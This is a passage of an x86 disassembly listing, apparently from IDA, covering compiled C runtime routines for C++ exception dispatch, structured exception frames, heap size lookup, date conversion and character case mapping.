call sub_418123
add esp, 14h
mov ebx, eax
loc_41CE15: ; CODE XREF: sub_41CD45+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_41CEAC
cmp [ebx], edi
jg short loc_41CEA1
cmp edi, [ebx+4]
jg short loc_41CEA1
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_41CE9E
loc_41CE3A: ; CODE XREF: sub_41CD45+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_41CE6B
loc_41CE4C: ; CODE XREF: sub_41CD45+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_41CF94
add esp, 0Ch
test eax, eax
jnz short loc_41CE7A
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_41CE4C
loc_41CE6B: ; CODE XREF: sub_41CD45+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_41CE3A
jmp short loc_41CE9E
; ---------------------------------------------------------------------------
loc_41CE7A: ; CODE XREF: sub_41CD45+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41D0A5
add esp, 2Ch
loc_41CE9E: ; CODE XREF: sub_41CD45+F3�j
; sub_41CD45+133�j
mov edi, [ebp+var_10]
loc_41CEA1: ; CODE XREF: sub_41CD45+DE�j
; sub_41CD45+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_41CE15
; ---------------------------------------------------------------------------
loc_41CEAC: ; CODE XREF: sub_41CD45+D6�j
cmp [ebp+arg_14], 0
jz short loc_41CEBC
push 1
push esi
call sub_41D41A
pop ecx
pop ecx
loc_41CEBC: ; CODE XREF: sub_41CD45+56�j
; sub_41CD45+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41CEC1: ; CODE XREF: sub_41CD45+37�j
; sub_41CD45+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_41CEE7
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41CEEC
add esp, 20h
jmp short loc_41CEBC
; ---------------------------------------------------------------------------
loc_41CEE7: ; CODE XREF: sub_41CD45+180�j
jmp sub_41D4FC
sub_41CD45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEEC proc near ; CODE XREF: sub_41CD45+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp ds:dword_4CDA38, 0
push esi
push edi
jz short loc_41CF1D
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417FFA
add esp, 1Ch
test eax, eax
jnz short loc_41CF90
loc_41CF1D: ; CODE XREF: sub_41CEEC+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_418123
add esp, 14h
mov esi, eax
loc_41CF39: ; CODE XREF: sub_41CEEC+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_41CF90
cmp edi, [esi]
jl short loc_41CF88
cmp edi, [esi+4]
jg short loc_41CF88
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41CF62
cmp byte ptr [ecx+8], 0
jnz short loc_41CF88
loc_41CF62: ; CODE XREF: sub_41CEEC+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41D0A5
add esp, 2Ch
loc_41CF88: ; CODE XREF: sub_41CEEC+57�j
; sub_41CEEC+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_41CF39
; ---------------------------------------------------------------------------
loc_41CF90: ; CODE XREF: sub_41CEEC+2F�j
; sub_41CEEC+53�j
pop edi
pop esi
leave
retn
sub_41CEEC endp
; =============== S U B R O U T I N E =======================================
sub_41CF94 proc near ; CODE XREF: sub_41CD45+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_41CFEB
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_41CFEB
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_41CFC5
add ecx, 8
push ecx
push edx
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41CFE7
loc_41CFC5: ; CODE XREF: sub_41CF94+1F�j
test byte ptr [esi], 2
jz short loc_41CFCF
test byte ptr [edi], 8
jz short loc_41CFE7
loc_41CFCF: ; CODE XREF: sub_41CF94+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_41CFDE
test byte ptr [edi], 1
jz short loc_41CFE7
loc_41CFDE: ; CODE XREF: sub_41CF94+43�j
test al, 2
jz short loc_41CFEB
test byte ptr [edi], 2
jnz short loc_41CFEB
loc_41CFE7: ; CODE XREF: sub_41CF94+2F�j
; sub_41CF94+39�j ...
xor eax, eax
jmp short loc_41CFEE
; ---------------------------------------------------------------------------
loc_41CFEB: ; CODE XREF: sub_41CF94+B�j
; sub_41CF94+14�j ...
push 1
pop eax
loc_41CFEE: ; CODE XREF: sub_41CF94+55�j
pop edi
pop esi
retn
sub_41CF94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CFF1 proc near ; CODE XREF: sub_41CCAA+34�p
; sub_41D0A5+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424860
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_41D023: ; CODE XREF: sub_41CFF1+8A�j
cmp esi, [ebp+arg_C]
jz short loc_41D07D
cmp esi, 0FFFFFFFFh
jle short loc_41D032
cmp esi, [edi+4]
jl short loc_41D037
loc_41D032: ; CODE XREF: sub_41CFF1+3A�j
call sub_41D552
loc_41D037: ; CODE XREF: sub_41CFF1+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_41D052
push 103h
push ebx
push eax
call sub_41D4B0
loc_41D052: ; CODE XREF: sub_41CFF1+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D072
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_41D08F
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_41D072: ; CODE XREF: sub_41CFF1+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_41D023
; ---------------------------------------------------------------------------
loc_41D07D: ; CODE XREF: sub_41CFF1+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41CFF1 endp
; =============== S U B R O U T I N E =======================================
sub_41D08F proc near ; CODE XREF: sub_41CFF1+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41D0A0
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D0A0: ; CODE XREF: sub_41D08F+C�j
jmp sub_41D4FC
sub_41D08F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0A5 proc near ; CODE XREF: sub_41CD45+151�p
; sub_41CEEC+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_41D0C7
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_41D256
add esp, 10h
loc_41D0C7: ; CODE XREF: sub_41D0A5+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_41D0D3
push edi
jmp short loc_41D0D6
; ---------------------------------------------------------------------------
loc_41D0D3: ; CODE XREF: sub_41D0A5+29�j
push [ebp+arg_24]
loc_41D0D6: ; CODE XREF: sub_41D0A5+2C�j
call sub_417EFC
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_41CFF1
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41D120
add esp, 2Ch
test eax, eax
jz short loc_41D11B
push edi
push eax
call sub_417EBA
loc_41D11B: ; CODE XREF: sub_41D0A5+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41D0A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D120 proc near ; CODE XREF: sub_41D0A5+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424870
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, ds:dword_4CDA30
mov [ebp+var_1C], ecx
mov ecx, ds:dword_4CDA34
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov ds:dword_4CDA30, edi
mov ecx, [ebp+arg_8]
mov ds:dword_4CDA34, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_417F81
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_41D1E6
mov eax, [ebp+var_2C]
loc_41D1AD: ; CODE XREF: sub_41D1C6+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D120 endp
; =============== S U B R O U T I N E =======================================
sub_41D1BC proc near ; DATA XREF: _1:00424880�o
push dword ptr [ebp-14h]
call sub_41D22C
pop ecx
retn
sub_41D1BC endp
; =============== S U B R O U T I N E =======================================
sub_41D1C6 proc near ; DATA XREF: _1:00424884�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_4181E2
pop ecx
pop ecx
xor eax, eax
jmp short loc_41D1AD
sub_41D1C6 endp
; ---------------------------------------------------------------------------
loc_41D1DE: ; DATA XREF: _1:00424878�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_41D1E6 proc near ; CODE XREF: sub_41D120+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov ds:dword_4CDA30, eax
mov eax, [ebp-20h]
mov ds:dword_4CDA34, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_41D22B
cmp dword ptr [edi+10h], 3
jnz short locret_41D22B
cmp dword ptr [edi+14h], 19930520h
jnz short locret_41D22B
cmp [ebp-24h], ebx
jnz short locret_41D22B
cmp [ebp-2Ch], ebx
jz short locret_41D22B
call sub_41824A
push eax
push edi
call sub_41D41A
pop ecx
pop ecx
locret_41D22B: ; CODE XREF: sub_41D1E6+1C�j
; sub_41D1E6+22�j ...
retn
sub_41D1E6 endp
; =============== S U B R O U T I N E =======================================
sub_41D22C proc near ; CODE XREF: sub_41D1BC+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41D253
cmp dword ptr [eax+10h], 3
jnz short loc_41D253
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41D253
cmp dword ptr [eax+1Ch], 0
jnz short loc_41D253
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D253: ; CODE XREF: sub_41D22C+C�j
; sub_41D22C+12�j ...
xor eax, eax
retn
sub_41D22C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D256 proc near ; CODE XREF: sub_41D0A5+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424888
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_41D3FF
cmp byte ptr [eax+8], 0
jz loc_41D3FF
mov eax, [ecx+8]
test eax, eax
jz loc_41D3FF
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_41D2F3
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_41D2E4: ; CODE XREF: sub_41D256+F5�j
push eax
call sub_41D481
pop ecx
pop ecx
mov [edi], eax
jmp loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D2F3: ; CODE XREF: sub_41D256+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_41D34D
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_4182C0
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41D3FB
mov eax, [edi]
test eax, eax
jz loc_41D3FB
add esi, 8
push esi
jmp short loc_41D2E4
; ---------------------------------------------------------------------------
loc_41D34D: ; CODE XREF: sub_41D256+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_41D395
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz short loc_41D3F6
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_41D481
pop ecx
pop ecx
push eax
push edi
call sub_4182C0
add esp, 0Ch
jmp short loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D395: ; CODE XREF: sub_41D256+103�j
call sub_4208D2
pop ecx
pop ecx
test eax, eax
jz short loc_41D3F6
push 1
push edi
call sub_4208EE
pop ecx
pop ecx
test eax, eax
jz short loc_41D3F6
push dword ptr [esi+18h]
call sub_42090A
pop ecx
test eax, eax
jz short loc_41D3F6
test byte ptr [esi], 4
jz short loc_41D3DC
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41D481
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_417EF5
jmp short loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D3DC: ; CODE XREF: sub_41D256+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41D481
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_417EEE
jmp short loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D3F6: ; CODE XREF: sub_41D256+6A�j
; sub_41D256+7C�j ...
call sub_41D552
loc_41D3FB: ; CODE XREF: sub_41D256+98�j
; sub_41D256+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_41D3FF: ; CODE XREF: sub_41D256+2E�j
; sub_41D256+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D256 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41D4FC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D41A proc near ; CODE XREF: sub_41CD45+170�p
; sub_41D1E6+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424898
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41D461
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41D461
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_417EEE
or [ebp+var_4], 0FFFFFFFFh
loc_41D461: ; CODE XREF: sub_41D41A+2A�j
; sub_41D41A+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D41A endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41D4FC
; =============== S U B R O U T I N E =======================================
sub_41D481 proc near ; CODE XREF: sub_41D256+8F�p
; sub_41D256+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_41D4A2
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41D4A2: ; CODE XREF: sub_41D481+12�j
pop esi
retn
sub_41D481 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D4B0 proc near ; CODE XREF: sub_417F81+40�p
; sub_41CFF1+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_41826D
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41D4EF
mov ecx, 2
loc_41D4EF: ; CODE XREF: sub_41D4B0+38�j
push ecx
call sub_41826D
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41D4B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D4FC proc near ; CODE XREF: sub_41CD45:loc_41CEE7�j
; sub_41D08F:loc_41D0A0�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00420922 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4248A8
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:dword_4CDA3C
test eax, eax
jz short loc_41D544
mov [ebp+var_4], 1
call eax
jmp short loc_41D540
; ---------------------------------------------------------------------------
loc_41D539: ; DATA XREF: _1:004248B8�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D53D: ; DATA XREF: _1:004248BC�o
mov esp, [ebp+var_18]
loc_41D540: ; CODE XREF: sub_41D4FC+3B�j
and [ebp+var_4], 0
loc_41D544: ; CODE XREF: sub_41D4FC+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41D54D: ; DATA XREF: _1:004248B0�o
jmp loc_420922
sub_41D4FC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D552 proc near ; CODE XREF: sub_418123+23�p
; sub_418123:loc_41818E�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4248C0
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, ds:off_435FF4
test eax, eax
jz short loc_41D59A
mov [ebp+var_4], 1
call eax ; sub_41D4FC
jmp short loc_41D596
; ---------------------------------------------------------------------------
loc_41D58F: ; DATA XREF: _1:004248D0�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D593: ; DATA XREF: _1:004248D4�o
mov esp, [ebp+var_18]
loc_41D596: ; CODE XREF: sub_41D552+3B�j
and [ebp+var_4], 0
loc_41D59A: ; CODE XREF: sub_41D552+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41D5A3: ; DATA XREF: _1:004248C8�o
jmp sub_41D4FC
sub_41D552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5A8 proc near ; CODE XREF: sub_418603+7�p
; sub_418603+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_4CF028
push esi
cmp eax, 3
jnz short loc_41D5D1
mov esi, [ebp+arg_0]
push esi
call sub_41AD89
test eax, eax
pop ecx
jz short loc_41D5CE
mov eax, [esi-4]
sub eax, 9
jmp short loc_41D606
; ---------------------------------------------------------------------------
loc_41D5CE: ; CODE XREF: sub_41D5A8+1C�j
push esi
jmp short loc_41D5F8
; ---------------------------------------------------------------------------
loc_41D5D1: ; CODE XREF: sub_41D5A8+E�j
cmp eax, 2
jnz short loc_41D5F5
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_41BAE4
add esp, 0Ch
test eax, eax
jz short loc_41D5F5
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_41D606
; ---------------------------------------------------------------------------
loc_41D5F5: ; CODE XREF: sub_41D5A8+2C�j
; sub_41D5A8+43�j
push [ebp+arg_0]
loc_41D5F8: ; CODE XREF: sub_41D5A8+27�j
push 0
push ds:dword_4CF024
call ds:dword_4241C0 ;; RtlSizeHeap
loc_41D606: ; CODE XREF: sub_41D5A8+24�j
; sub_41D5A8+4B�j
pop esi
leave
retn
sub_41D5A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D609 proc near ; CODE XREF: sub_4186B1+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_41D6C5
cmp ebx, 8Ah
jg loc_41D6C5
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, ds:dword_436724[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41D648
cmp edi, 2
jle short loc_41D648
inc esi
loc_41D648: ; CODE XREF: sub_41D609+37�j
; sub_41D609+3C�j
call sub_420939
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, ds:dword_436640
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_41D6BB
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_41D6C1
cmp ds:dword_436644, 0
jz short loc_41D6C1
lea eax, [ebp+var_24]
push eax
call sub_420BAC
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_41D6C1
loc_41D6BB: ; CODE XREF: sub_41D609+90�j
add ecx, ds:dword_436648
loc_41D6C1: ; CODE XREF: sub_41D609+96�j
; sub_41D609+9F�j ...
mov eax, ecx
jmp short loc_41D6C8
; ---------------------------------------------------------------------------
loc_41D6C5: ; CODE XREF: sub_41D609+13�j
; sub_41D609+1F�j
or eax, 0FFFFFFFFh
loc_41D6C8: ; CODE XREF: sub_41D609+BA�j
pop ebx
leave
retn
sub_41D609 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6CB proc near ; CODE XREF: sub_418833+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4CDA48, 0
push ebx
jnz short loc_41D6F6
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_41D794
cmp eax, 7Ah
jg loc_41D794
sub eax, 20h
jmp loc_41D794
; ---------------------------------------------------------------------------
loc_41D6F6: ; CODE XREF: sub_41D6CB+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_41D729
cmp ds:dword_433E7C, 1
jle short loc_41D716
push 2
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41D721
; ---------------------------------------------------------------------------
loc_41D716: ; CODE XREF: sub_41D6CB+3D�j
mov eax, ds:off_433C70
mov al, [eax+ebx*2]
and eax, 2
loc_41D721: ; CODE XREF: sub_41D6CB+49�j
test eax, eax
jnz short loc_41D729
loc_41D725: ; CODE XREF: sub_41D6CB+AF�j
mov eax, ebx
jmp short loc_41D794
; ---------------------------------------------------------------------------
loc_41D729: ; CODE XREF: sub_41D6CB+34�j
; sub_41D6CB+58�j
mov edx, ds:off_433C70
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41D74C
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_41D755
; ---------------------------------------------------------------------------
loc_41D74C: ; CODE XREF: sub_41D6CB+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_41D755: ; CODE XREF: sub_41D6CB+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push ds:dword_4CDA48
call sub_41E709
add esp, 20h
test eax, eax
jz short loc_41D725
cmp eax, 1
jnz short loc_41D787
movzx eax, [ebp+var_4]
jmp short loc_41D794
; ---------------------------------------------------------------------------
loc_41D787: ; CODE XREF: sub_41D6CB+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41D794: ; CODE XREF: sub_41D6CB+14�j
; sub_41D6CB+1D�j ...
pop ebx
leave
retn
sub_41D6CB endp
; =============== S U B R O U T I N E =======================================
